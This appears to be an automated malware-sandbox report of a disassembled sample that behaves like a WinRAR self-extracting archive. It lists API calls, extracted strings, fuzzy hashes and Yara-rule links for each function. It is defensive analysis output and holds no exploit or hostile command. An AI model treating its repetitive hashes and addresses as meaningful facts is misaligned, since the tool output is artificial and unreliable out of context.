Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: 61807ff78eab64920118834d0e08c1addbae4b72bca5908bf350fdc8c73c872d
Instruction ID: 7fb55233f8798db9e9c96693de3ca2870b0acc494d06ec25c8c64c7429ed2555
Opcode Fuzzy Hash: 61807ff78eab64920118834d0e08c1addbae4b72bca5908bf350fdc8c73c872d
Instruction Fuzzy Hash: D131D37160570AAFC7109F25DC48EABBBAEFF85751B048518FA02D23A1DB39DC00DAB5

Function 006EA5F4 Relevance: 7.6, APIs: 5, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,006EA4EF,000000FF,?,?), ref: 006EA628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,006EA4EF,000000FF,?,?), ref: 006EA65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,006EA4EF,000000FF,?,?), ref: 006EA66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,006EA4EF,000000FF,?,?), ref: 006EA692
GetLastError.KERNEL32(?,?,?,?,006EA4EF,000000FF,?,?), ref: 006EA69E

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: d259c318aeb41b613f71f2755b5a5eae9249923d62a4f2e2ac118cecbc19a6b8
Instruction ID: 2da136742151a662e31b6deb17fe853a76263463f658b991434285f185469020
Opcode Fuzzy Hash: d259c318aeb41b613f71f2755b5a5eae9249923d62a4f2e2ac118cecbc19a6b8
Instruction Fuzzy Hash: 10419476605385AFC720EF68C884ADAF7E9BF49340F044A2DF599D3240D734A9548B96

Function 0070753D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,00707513,00000000,0071BAD8,0000000C,0070766A,00000000,00000002,00000000), ref: 0070755E
TerminateProcess.KERNEL32(00000000,?,00707513,00000000,0071BAD8,0000000C,0070766A,00000000,00000002,00000000), ref: 00707565
ExitProcess.KERNEL32 ref: 00707577

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 172fd545a995e477120d5a8acce32762c0f4fa47aba9c5cabb4ebe3e40b7f4ea
Instruction ID: f7baf2b0d5c31974b57daee2f521ac49eed6c4757a82618cb9f2ad9783e9b96c
Opcode Fuzzy Hash: 172fd545a995e477120d5a8acce32762c0f4fa47aba9c5cabb4ebe3e40b7f4ea
Instruction Fuzzy Hash: DBE0B631404A48EFCF15AF68DD0DA893BAAEB44781F10C514F9099B2A2CB3DEE52DB54

Function 006E857B Relevance: 3.9, APIs: 2, Instructions: 947COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E8580
_memcmp.LIBVCRUNTIME ref: 006E8A08

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prolog_memcmp
String ID:
API String ID: 3004599000-0
Opcode ID: c2343113243d6da164e697bb6e00a27a3873f9299da28e73766032e5984a3a85
Instruction ID: 852fb73ec4cb7b5695abebe53e76dd9c375493c5a647069580057b6566709d25
Opcode Fuzzy Hash: c2343113243d6da164e697bb6e00a27a3873f9299da28e73766032e5984a3a85
Instruction Fuzzy Hash: 56820B709063C5AEDF25DB65C885BFAB7BBAF15300F0840B9ED4D9B242DB315A49CB60

Function 006FAEE0 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006FAEE5

Part of subcall function 006E130B: GetDlgItem.USER32(00000000,00003021), ref: 006E134F
Part of subcall function 006E130B: SetWindowTextW.USER32(00000000,007135B4), ref: 006E1365

Strings

-el -s2 "-d%s" "-sp%s", xrefs: 006FB281
<, xrefs: 006FB29A
C:\Users\user\Desktop, xrefs: 006FB2DF
__tmp_rar_sfx_access_check_%u, xrefs: 006FB1CB
winrarsfxmappingfile.tmp, xrefs: 006FB2BC
LICENSEDLG, xrefs: 006FB771
STARTDLG, xrefs: 006FAF04
"%s"%s, xrefs: 006FB423
@, xrefs: 006FB2A7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3344487560
Opcode ID: ef0e170bb2e34b485d639ea7412cb1aeeffb43e748c9b24ca05d3d243dd6d0ef
Instruction ID: 8ea9734e33e5dd1e10e510bffc56638a69248e1fed330d8859c8ffb4692dc3f1
Opcode Fuzzy Hash: ef0e170bb2e34b485d639ea7412cb1aeeffb43e748c9b24ca05d3d243dd6d0ef
Instruction Fuzzy Hash: 5442D5B0945288BBEB21AFA4DC49FFE777EAB01700F408159F705A61D2CB7D4945CB2A

Function 006F00CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 006F00E4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 006F00F6
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 006F0127
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 006F03D4
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006F03F0
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 006F0402
ReadFile.KERNEL32(00000000,?,00007FFE,00713BA4,00000000), ref: 006F0421
CloseHandle.KERNEL32(00000000), ref: 006F0479
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 006F048F
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 006F04E7
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 006F0510
GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 006F054A

Part of subcall function 006F0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006F00A0
Part of subcall function 006F0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,006EEB86,Crypt32.dll,00000000,006EEC0A,?,?,006EEBEC,?,?,?), ref: 006F00C2

_swprintf.LIBCMT ref: 006F05BE
_swprintf.LIBCMT ref: 006F060A

Part of subcall function 006E400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006E401D

AllocConsole.KERNEL32 ref: 006F0612
GetCurrentProcessId.KERNEL32 ref: 006F061C
AttachConsole.KERNEL32(00000000), ref: 006F0623
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 006F0649
WriteConsoleW.KERNEL32(00000000), ref: 006F0650
Sleep.KERNEL32(00002710), ref: 006F065B
FreeConsole.KERNEL32 ref: 006F0661
ExitProcess.KERNEL32 ref: 006F0669

Strings

\Aq, xrefs: 006F03A7
T?q, xrefs: 006F02C0
(@q, xrefs: 006F0323
SetDefaultDllDirectories, xrefs: 006F0121
p?q, xrefs: 006F02CB
dwmapi.dll, xrefs: 006F0581
x=q, xrefs: 006F0204
`=q, xrefs: 006F01FC
T;q, xrefs: 006F0154
(>q, xrefs: 006F023C
?q, xrefs: 006F02AA
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 006F05F8
kernel32, xrefs: 006F00DD
>q, xrefs: 006F0289
l<q, xrefs: 006F055C
D=q, xrefs: 006F01F4
<q, xrefs: 006F018C
<?q, xrefs: 006F02B5
@@q, xrefs: 006F032E
0Aq, xrefs: 006F0391
X>q, xrefs: 006F0252
?q, xrefs: 006F0302
P<q, xrefs: 006F019C
p>q, xrefs: 006F025D
|<q, xrefs: 006F01AC
SetDllDirectoryW, xrefs: 006F00F0
X@q, xrefs: 006F0339
uxtheme.dll, xrefs: 006F058B
@>q, xrefs: 006F0247
DAq, xrefs: 006F039C
8<q, xrefs: 006F0194
4=q, xrefs: 006F01EC
p@q, xrefs: 006F0344
DXGIDebug.dll, xrefs: 006F0169, 006F04D3

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: <q$ ?q$(>q$(@q$0Aq$4=q$8<q$<?q$@>q$@@q$D=q$DAq$DXGIDebug.dll$P<q$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;q$T?q$X>q$X@q$\Aq$`=q$dwmapi.dll$kernel32$l<q$p>q$p?q$p@q$uxtheme.dll$x=q$|<q$>q$?q
API String ID: 1201351596-2496449578
Opcode ID: ba723f7d7fcb867c644903f806a810b544f95ab4e9ca90ada9f22edc1528206e
Instruction ID: b580e72ddd8bb9cfade12588b3844c7fdbc24c5ae280223e2075995e24de5546
Opcode Fuzzy Hash: ba723f7d7fcb867c644903f806a810b544f95ab4e9ca90ada9f22edc1528206e
Instruction Fuzzy Hash: 1CD178B11083849BD730DF58D849BDFBBE9BB85704F10492DF685962C1D7B887888F66

Function 006FBDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 006FBDFA

Part of subcall function 006FAA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 006FAAFE

SetWindowTextW.USER32(?,?), ref: 006FC127
_wcsrchr.LIBVCRUNTIME ref: 006FC2B1
GetDlgItem.USER32(?,00000066), ref: 006FC2EC
SetWindowTextW.USER32(00000000,?), ref: 006FC2FC
SendMessageW.USER32(00000000,00000143,00000000,0072A472), ref: 006FC30A
SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006FC335

Strings

<br>, xrefs: 006FC08A
ProgramFilesDir, xrefs: 006FC1FB
Software\Microsoft\Windows\CurrentVersion, xrefs: 006FC1D0
%s.%d.tmp, xrefs: 006FBFF6

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
API String ID: 3564274579-312220925
Opcode ID: b287c6fd6f0e6a1c3be0fc26bd8dcce6b663881cf01043cc58bb64b36e5d4800
Instruction ID: 8b89ba3bf6c6806fec94af63cfba4a1e9a5ffbb8aa8009f3dca7098d8131d8c7
Opcode Fuzzy Hash: b287c6fd6f0e6a1c3be0fc26bd8dcce6b663881cf01043cc58bb64b36e5d4800
Instruction Fuzzy Hash: 77E19176D0021CAADB25DBA4DD49DEF73BDAF08310F0041AAF609E3191EB749B858B64

Function 006ED341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 006ED346
_wcschr.LIBVCRUNTIME ref: 006ED367
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,006ED328,?), ref: 006ED382
__fprintf_l.LIBCMT ref: 006ED873

Part of subcall function 006F137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,006EB652,00000000,?,?,?,0001042E), ref: 006F1396

Strings

a, xrefs: 006ED4EF
, xrefs: 006ED67A
R, xrefs: 006ED4E5
*messages***, xrefs: 006ED4D3
$9q, xrefs: 006ED6AF
,, xrefs: 006ED8AE
*messages***, xrefs: 006ED49A
@%s:, xrefs: 006ED85D, 006ED869
RTL, xrefs: 006ED838
$%s:, xrefs: 006ED856

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
String ID: $ ,$$%s:$$9q$*messages***$*messages***$@%s:$R$RTL$a
API String ID: 4184910265-356711600
Opcode ID: 8f6637477b7c44c15a361869adacd37d75ba94a7c683e53dc1e05e4f739e9a18
Instruction ID: a33641461bcf52211e72a3db03c0c828b541348bad18ff2798f35e4b3adfaf12
Opcode Fuzzy Hash: 8f6637477b7c44c15a361869adacd37d75ba94a7c683e53dc1e05e4f739e9a18
Instruction Fuzzy Hash: D112C2B1901399EADF24DFA5CC85BEEB7B6EF04304F10416EE505A72D2EB749A41CB24

Function 006FCB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006FAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 006FAC85
Part of subcall function 006FAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006FAC96
Part of subcall function 006FAC74: IsDialogMessageW.USER32(0001042E,?), ref: 006FACAA
Part of subcall function 006FAC74: TranslateMessage.USER32(?), ref: 006FACB8
Part of subcall function 006FAC74: DispatchMessageW.USER32(?), ref: 006FACC2

GetDlgItem.USER32(00000068,0073ECB0), ref: 006FCB6E
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,006FA632,00000001,?,?,006FAECB,00714F88,0073ECB0), ref: 006FCB96
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 006FCBA1
SendMessageW.USER32(00000000,000000C2,00000000,007135B4), ref: 006FCBAF
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 006FCBC5
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 006FCBDF
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 006FCC23
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 006FCC31
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 006FCC40
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 006FCC67
SendMessageW.USER32(00000000,000000C2,00000000,0071431C), ref: 006FCC76

Strings

\, xrefs: 006FCBCF

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: fe31b2f24716ff835d8071fec6e30add248f445eebf18c4d6caa50304700b968
Instruction ID: 70e0e5a38b6a695a395b191e658d4f214fdbfdee41f307b184a0dcdd38b03ff6
Opcode Fuzzy Hash: fe31b2f24716ff835d8071fec6e30add248f445eebf18c4d6caa50304700b968
Instruction Fuzzy Hash: 29313471145345AFD301DF20DC8AFAB7FACEF42704F004509F650962A2DBA94916C77E

Function 006FCE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(?), ref: 006FCF54
ShowWindow.USER32(?,00000000), ref: 006FCF93
GetExitCodeProcess.KERNEL32(?,?), ref: 006FCFCF
CloseHandle.KERNEL32(?), ref: 006FCFF5
ShowWindow.USER32(?,00000001), ref: 006FD084

Part of subcall function 006F17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,006EBB05,00000000,.exe,?,?,00000800,?,?,006F85DF,?), ref: 006F17C2

Strings

, xrefs: 006FCEA2
.inf, xrefs: 006FCF10
.exe, xrefs: 006FCFFF

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 2255c36701918ba47e3a16aa3c02fc2f593a02f09e7dfc24df4a5aef9e0f7832
Instruction ID: 192e4aceb69a428461260069b9eed620c207b35f367e32c1566978dcbb8ab380
Opcode Fuzzy Hash: 2255c36701918ba47e3a16aa3c02fc2f593a02f09e7dfc24df4a5aef9e0f7832
Instruction Fuzzy Hash: 8461067140838CAAD7319F24D904AFBBBE7AF81310F04881DF6C4973A5DB759986CB55

Function 0070A058 Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00704E35,00704E35,?,?,?,0070A2A9,00000001,00000001,3FE85006), ref: 0070A0B2
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0070A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0070A138
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0070A232
__freea.LIBCMT ref: 0070A23F

Part of subcall function 00708518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0070C13D,00000000,?,007067E2,?,00000008,?,007089AD,?,?,?), ref: 0070854A

__freea.LIBCMT ref: 0070A248
__freea.LIBCMT ref: 0070A26D

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 2f1ff7201c49846a5fd0ea1e7fb72d6a5f4e1fe4192605d13dd2e346d9c2ae22
Instruction ID: dfeed4e52c4b611b4831ab8af36ec365b05a65e0d6fc82704d0726d14b624761
Opcode Fuzzy Hash: 2f1ff7201c49846a5fd0ea1e7fb72d6a5f4e1fe4192605d13dd2e346d9c2ae22
Instruction Fuzzy Hash: F0518C7261031AFFEB258E64CC45EAA77EAEB84750F154729FD04D61C0EB79DC4086A2

Function 006FA2C7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 006FA2DE
SHAutoComplete.SHLWAPI(?,00000010), ref: 006FA315

Part of subcall function 006F17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,006EBB05,00000000,.exe,?,?,00000800,?,?,006F85DF,?), ref: 006F17C2

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 006FA305

Strings

@Uxu, xrefs: 006FA315
EDIT, xrefs: 006FA2E9, 006FA2F4, 006FA301

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: @Uxu$EDIT
API String ID: 4243998846-59804995
Opcode ID: 19bfccf9dd3056b11a080ae5bc7114f1177a0864317e68760e8f97797d15f945
Instruction ID: 21359a3819997ce52d3f3e8ff2cbe1f4d190124b3016f0246a1df0820292fd1c
Opcode Fuzzy Hash: 19bfccf9dd3056b11a080ae5bc7114f1177a0864317e68760e8f97797d15f945
Instruction Fuzzy Hash: 8BF0E232A0122C77E73056649C05FEB73AC9F47B01F444066BE08E2291D7649952C6FA

Function 006E99B0 Relevance: 7.6, APIs: 5, Instructions: 117
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,006E78AD,?,00000005,?,00000011), ref: 006E9A4C
GetLastError.KERNEL32(?,?,006E78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006E9A59
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,006E78AD,?,00000005,?), ref: 006E9A8E
GetLastError.KERNEL32(?,?,006E78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006E9A96
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,006E78AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 006E9ADB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
